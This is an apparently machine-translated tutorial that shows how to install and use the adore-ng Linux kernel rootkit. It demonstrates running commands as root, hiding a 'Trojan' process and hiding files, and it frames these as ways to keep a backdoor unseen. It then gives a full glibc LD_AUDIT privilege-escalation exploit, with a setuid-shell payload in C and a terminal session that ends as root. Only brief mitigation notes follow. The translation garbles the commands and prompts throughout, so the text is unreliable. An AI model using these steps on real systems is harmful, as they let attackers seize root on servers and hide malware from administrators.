Official website: https://github.com/trimpsyw/adore-ng
Installation:
[Email protected] ~]# Unzipadore-ng-master.zip
[Email protected] ~]# Cdadore-ng-master
[[email protected] adore-ng-master] #rpm-ivh/mnt/packages/kernel-devel-2.6.32-220.el6.x86_64.rpm
Yum Install gcc*
[[Email protected]]# make
[Email protected]]# insmod Adore-ng.ko #加载模块
Test, view Help:
[Email protected]]#./ava-h
Usage:./ava {h,u,r,r,i,v,u}[file or PID]
I Print info (Secret UID etc)
H Hide File #隐藏文件
U Unhide File
R EXECUTE as Root #可以提权, run the program as root
R Remove PID Forever
U Uninstall Adore
I make PID invisible #隐藏进程. Hide your Trojan program
V Make PID visible
Test: Prepare the environment and create an ordinary user to test. Then on the average user, through the AVA command, after the right to run a process as root.
Power: Improve your own permissions on the server.
[Email protected] ~]# Useradd tree
[Email protected] ~]# echo 123456| passwd--stdin Tree
changing password for Usertree
Passwd:all Authenticationtokens updated successfully.
Example 1: Rights are raised through the AVA command. Allow normal user tree to gain root privileges
[Email protected]]# cp-r/root/adore-ng-master/tmp/
[Email protected]]# chmod 777/tmp/adore-ng-master/-R
[[email protected] adore-ng-master] #ssh [email protected] #以普通帐号登录
[Email protected] ~]$ cd/tmp/adore-ng-master/
[[email protected]] $ pwd
/tmp/adore-ng-master
[[email protected] Adore-ng-master]$./ava I #查看基本信息, can pop up the following information to show that the program is working properly
56,500,500,56
Adore 1.56 installed. Goodluck.
elite_uid:2618748389,elite_gid=4063569279, ADORE_KEY=FGJGGGFD current_adore=56
Actual combat: R option: Execute AS Root #以root身份运行程序
[[email protected] adore-ng-master] $ll/etc/shadow
----------1 root root 1071Apr 7 10:17/etc/shadow
[[email protected] adore-ng-master] $vim/etc/shadow
[[email protected] adore-ng-master]$./ava r Vim/etc/shadow #编辑时, can write some content, test whether can write normally
To view the modification success:
[Email protected] ~]# Vim/etc/shadow
In addition, the user identity of this process is viewed on a different terminal:
[Email protected] ~]# Ps-axu | grep Shadow
Warning:bad syntax, perhaps Abogus '-'? See/usr/share/doc/procps-3.2.7/faq
Root 6874 0.1 0.1 10216 2924 PTS/3 s+ 04:12 0:00/usr/bin/vim/etc/shadow
Root 6879 0.0 0.0 4024 692 pts/2 s+ 04:12 0:00 grep Shadow
Leave the back door, no one to see?
Combat 2: Hide the process. Hide your Trojan program
Simulate a Trojan horse program:
[Email protected]]$ cat a.sh
#!/bin/bash
Sleep 2000
[Email protected]]$ chmod +x a.sh
[Email protected]]$./a.sh &
View:
[Email protected] ~]# Ps-axu | grep a.sh
Warning:bad syntax,perhaps a bogus '-'? See/usr/share/doc/procps-3.2.8/faq
Tree 6339 0.0 0.1 106148 1184 PTS/3 S 10:32 0:00/bin/bash./a.sh
Hide Process
[Email protected]]$./ava I 6339 #隐藏进程
56,500,500,56
Adore 1.56 installed. Goodluck.
Made PID 6339 invisible.
[Email protected] ~]# Ps-axu |grep a.sh #查看
Warning:bad syntax, perhaps Abogus '-'? See/usr/share/doc/procps-3.2.8/faq
Root 10225 0.0 0.0 103300 852 PTS/4 s+ 22:54 0:00 grep a.sh
Combat 3: Hide Files
[[email protected] adore-ng-master] $mkdir test
[[email protected] adore-ng-master] $CD test/
[Email protected] test]$ echo AAAA >a.php
[Email protected] test]$ ls-a
. .. a.php
Hide File
[Email protected] Test]$/tmp/adore-ng-master/ava h a.php
56,500,500,56
Adore 1.56 installed. Goodluck.
File ' a.php ' is now hidden.
View:
[Email protected] test]$ ls-a
. ..
[email protected] test]$ cat a.php
Aaaa
Try: Find the file that was recently modified
[[email protected] test] $touch b.php
[[email protected] test]$ ls
b.php
[[email protected] test] $find./-mtime-2
./
./b.php #找不到出来
There is no way to view the a.php: No. Unless you turn off the rootkit Trojan.
To recover it:
[Email protected] Test]$/tmp/adore-ng-master/ava u a.php
56,500,500,56
Adore 1.56 installed. Goodluck.
File ' a.php ' is now visible.
[Email protected] test]$ ls-a
. .. a.php
Summarize:
1. Right to be raised through rootkits
2, through the rootkit hidden Trojan process number
3. Hide Trojan files via rootkits
Create a Trojan file that will not be deleted by the root user
[[Email protected] ~] #lsattr b.txt
----I--------E-b.txt
[[Email protected] ~] #chattr-I b.txt
[Email protected] ~]# RM-RF b.txt
Actual combat 2:linux under the ordinary user right to withdraw
Right: you don't understand. Listen to the depth, the latter can make the effect can be
Right: Elevate from normal user to root privilege
Note: The following vulnerabilities exist for RHEL5 to RHEL6.0 32-bit operating systems and 64-bit operating systems.
Exploit the vulnerability of the GLIBC library to raise power.
Log in as a normal user
[Email protected] ~]# SU-MK
[Email protected] ~]$
SUID: When the user executes command A, this command is run as the owner of command A.
[Email protected] ~]$ cd/tmp/
[[email protected] tmp] $ls-ld/tmp/
DRWXRWXRWT Root root4096 10-14 21:29/tmp/
[[email protected] tmp] $CD/tmp/
[[email protected] tmp] $mkdir exploit//Create a folder anywhere in the TMP directory exploit: Use
[[Email protected]]$ ll/bin/ping
-rwsr-xr-x 1 root root35832 Apr 2009/bin/ping
[[email protected] tmp] $LN/bin/ping/tmp/exploit/target//Create a hard link to the/bin/ping, the name of the hard link casually up
[[email protected] tmp] $exec 3</tmp/exploit/target
[[email protected] tmp] $LS-l/PROC/$$/FD/3
Lr-x------1 Hellohello 10-20 09:30/PROC/10990/FD/3-/tmp/exploit/target
[[email protected] tmp] $RM-fr/tmp/exploit/
[[email protected] tmp] $LS-l/PROC/$$/FD/3//View link has been deleted
Lr-x------1 Hellohello 10-20 09:30/proc/10990/fd/3/tmp/exploit/target (Deleted)
[[email protected] tmp] $CAT PAYLOAD.C//write a C language program
Void__attribute__ ((constructor)) init ()
{
setuid (0);
System ("/bin/bash");
}
[[email protected] tmp] $GCC-W-fpic-shared-o/tmp/exploit PAYLOAD.C//Compile C program
[[email protected] tmp] $LS-l/tmp/exploit
-rwxrwxr-x 1 Hellohello 4223 10-20 09:32/tmp/exploit
[[email protected] tmp] $whoami
Mk
[[email protected] tmp] $LD _audit= "\ $ORIGIN" EXEC/PROC/SELF/FD/3
[[email protected] tmp] #whoami
Root
In the RHEL6.1 attempt, the previous commands can be executed successfully, at the end of this command times the following error, and directly using the normal user to log out.
Hint: The image $origin cannot be loaded as an audit interface
Unable to open shared file ject;
Workaround:
You can control your rights by doing the following on the 777 directory. such as/tmp
# Mount-o Bind,nosuid/tmp/tmp
The user's home directory also needs to be patched with the above method:
[[Email protected] ~] #mount-o BIND,NOSUID/HOME/MK/HOME/MK
Modification is not necessary, the following error is prompted when you execute the LN command.
[Email protected] ~]# SU-MK
[Email protected] ~]$ ln/bin/ping/tmp/ping
ln:creating hard link '/tmp/ping ' = '/bin/ping ': Invalid cross-device link
#报错, error when creating a hard link, invalid cross device connection
Note: The Find permission is a 777 folder:
[Email protected] ~]# find/-perm-777-type D
/var/tmp
/dev/.mdadm
/dev/.udev
/dev/.udev/rules.d
/dev/shm
Find: '/PROC/9346/TASK/9346/FD/5 ': No such file or directory
Find: '/PROC/9346/TASK/9346/FDINFO/5 ': No such file or directory
Find: '/PROC/9346/FD/5 ': No such file or directory
Find: '/PROC/9346/FDINFO/5 ': No such file or directory
/tmp
/tmp/vmwarednd
/tmp/. Ice-unix
/tmp/. X11-unix
Normal user's home directory/home/ordinary users
Note:
-perm mode: File permissions exactly match mode
-perm +mode: File Permissions section matches mode
-perm-mode: File permissions are fully compliant with mode
Adore-ng notes and Linux general user rights